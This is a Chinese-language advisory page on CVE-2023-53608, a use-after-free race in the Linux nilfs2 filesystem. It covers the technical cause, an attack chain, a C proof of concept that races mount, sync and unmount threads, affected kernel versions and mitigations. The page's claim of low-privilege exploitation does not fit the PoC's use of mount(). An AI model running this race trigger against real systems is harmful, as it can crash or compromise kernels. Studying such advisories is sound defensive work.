CVE-2023-53608 Linux内核nilfs2文件系统UAF漏洞

漏洞信息

漏洞编号

CVE-2023-53608

漏洞类型

Use-After-Free（UAF）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核（nilfs2文件系统）

漏洞概述

CVE-2023-53608是Linux内核nilfs2文件系统中存在的一个高危Use-After-Free（UAF）漏洞。该漏洞位于日志段构造函数nilfs_segctor_thread()中，在线程终止过程中与nilfs_segctor_kill_thread()函数之间存在竞争条件（race condition）。具体而言，在nilfs_segctor_thread()函数结束时，会将struct nilfs_sc_info结构体中的sc_task成员赋值为NULL以表示线程已完成，然后通过sc_wait_task等待队列通知nilfs_segctor_kill_thread()。然而，在NULL赋值之后到通知发出之前，nilfs_segctor_kill_thread()可能检测到sc_task为NULL并返回继续执行内存释放操作，导致nilfs_sc_info结构体在线程发出通知前就被释放，从而引发UAF漏洞。该漏洞由KASAN（内核地址消毒器）检测发现，CVSS评分为7.8，属于高危级别。攻击者需要本地低权限访问即可利用此漏洞，可能导致内核崩溃、信息泄露、特权提升等严重后果，影响机密性、完整性和可用性。该漏洞影响多个Linux内核稳定版本，官方已通过多个补丁进行修复。

技术细节

该漏洞的根本原因是nilfs_segctor_thread()与nilfs_segctor_kill_thread()之间的同步机制存在缺陷。

技术原理：
1. nilfs_segctor_thread()是nilfs2文件系统的日志段构造守护线程，负责处理日志段的写入操作。在线程退出时，它执行以下序列：a) 将sc_task赋值为NULL；b) 通过waitqueue（sc_wait_task）唤醒等待中的nilfs_segctor_kill_thread()。

2. nilfs_segctor_kill_thread()在接收到通知后，会释放nilfs_sc_info结构体及其关联资源。

3. 竞争条件出现在以下场景：当nilfs_segctor_thread()完成NULL赋值后但尚未调用wake_up()通知之前，nilfs_segctor_kill_thread()可能已经通过其他路径检测到sc_task为NULL（例如通过sc_state_lock的检查），并提前返回执行清理逻辑，释放了nilfs_sc_info内存。

4. 之后nilfs_segctor_thread()尝试访问已被释放的nilfs_sc_info结构体（如访问sc_wait_task等待队列），触发UAF。

利用方式：
攻击者可通过本地低权限账户，通过频繁挂载/卸载nilfs2文件系统或触发文件系统操作，强制nilfs_segctor_thread()与nilfs_segctor_kill_thread()并发执行，从而触发竞争条件。成功后可导致内核崩溃（DoS）或进一步利用实现权限提升。

修复方案：
使用struct nilfs_sc_info的sc_state_lock自旋锁保护sc_task的NULL赋值和通知操作，确保原子性。由于nilfs_segctor_kill_thread()在检查sc_task是否为NULL时也持有sc_state_lock锁，从而消除了竞争窗口。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要本地低权限账户访问运行受影响Linux内核版本的系统，并确保系统支持nilfs2文件系统模块。

STEP 2

步骤2：触发竞争条件

通过并发执行nilfs2文件系统的挂载/卸载操作，触发nilfs_segctor_thread()与nilfs_segctor_kill_thread()之间的竞争窗口。

STEP 3

步骤3：利用UAF漏洞

当竞争条件成功触发时，nilfs_sc_info结构体在被释放后仍被nilfs_segctor_thread()访问，导致Use-After-Free。

STEP 4

步骤4：权限提升或拒绝服务

成功利用UAF后，攻击者可实现内核态任意代码执行，导致权限提升至root，或通过内核崩溃实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/* CVE-2023-53608 - nilfs2 UAF PoC
 * This PoC demonstrates the race condition between
 * nilfs_segctor_thread() and nilfs_segctor_kill_thread()
 *
 * Note: Requires a system with nilfs2 filesystem support
 * and local access with low privileges.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>

#define MOUNT_POINT "/tmp/nilfs_test"
#define NILFS_DEVICE "/dev/nullb0"  // null_blk device for testing

// Thread function to repeatedly mount/unmount nilfs2
void *race_thread(void *arg) {
    int iterations = *(int *)arg;
    for (int i = 0; i < iterations; i++) {
        // Mount nilfs2 filesystem
        if (mount(NILFS_DEVICE, MOUNT_POINT, "nilfs2", 0, "") == 0) {
            // Create some files to trigger segment construction
            char path[256];
            snprintf(path, sizeof(path), "%s/test_%d", MOUNT_POINT, i);
            int fd = open(path, O_CREAT | O_WRONLY, 0644);
            if (fd >= 0) {
                write(fd, "trigger segment construction\n", 28);
                close(fd);
            }
            // Sync to trigger segctor thread
            sync();
            // Unmount quickly to race with kill_thread
            umount(MOUNT_POINT);
        }
    }
    return NULL;
}

int main(int argc, char *argv[]) {
    int num_threads = 4;
    int iterations = 100;
    pthread_t threads[4];

    // Create mount point
    mkdir(MOUNT_POINT, 0755);

    printf("[+] Starting race condition trigger for CVE-2023-53608\n");
    printf("[+] Spawning %d threads, %d iterations each\n", num_threads, iterations);

    // Launch multiple threads to increase race probability
    for (int i = 0; i < num_threads; i++) {
        pthread_create(&threads[i], NULL, race_thread, &iterations);
    }

    // Wait for all threads
    for (int i = 0; i < num_threads; i++) {
        pthread_join(threads[i], NULL);
    }

    printf("[+] Race condition attempts completed\n");
    printf("[+] Check dmesg for KASAN UAF detection\n");

    rmdir(MOUNT_POINT);
    return 0;
}

影响范围

Linux kernel < 4.19.300

Linux kernel 4.20 ~ 5.4.262

Linux kernel 5.5 ~ 5.10.202

Linux kernel 5.11 ~ 5.15.140

Linux kernel 5.16 ~ 6.1.64

Linux kernel 6.2 ~ 6.5.13

Linux kernel 6.6 ~ 6.6.3

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）如果系统未使用nilfs2文件系统，可通过将CONFIG_NILFS2_FS设为n重新编译内核，或在运行时执行rmmod nilfs2卸载该模块；2）限制普通用户对块设备的访问权限，防止恶意用户频繁挂载/卸载nilfs2文件系统触发竞争条件；3）使用Linux安全模块（如SELinux、AppArmor）限制文件系统操作的权限范围；4）监控dmesg日志，关注KASAN报告的UAF异常，及时发现潜在攻击行为；5）关注Linux内核安全公告，及时应用官方发布的安全补丁。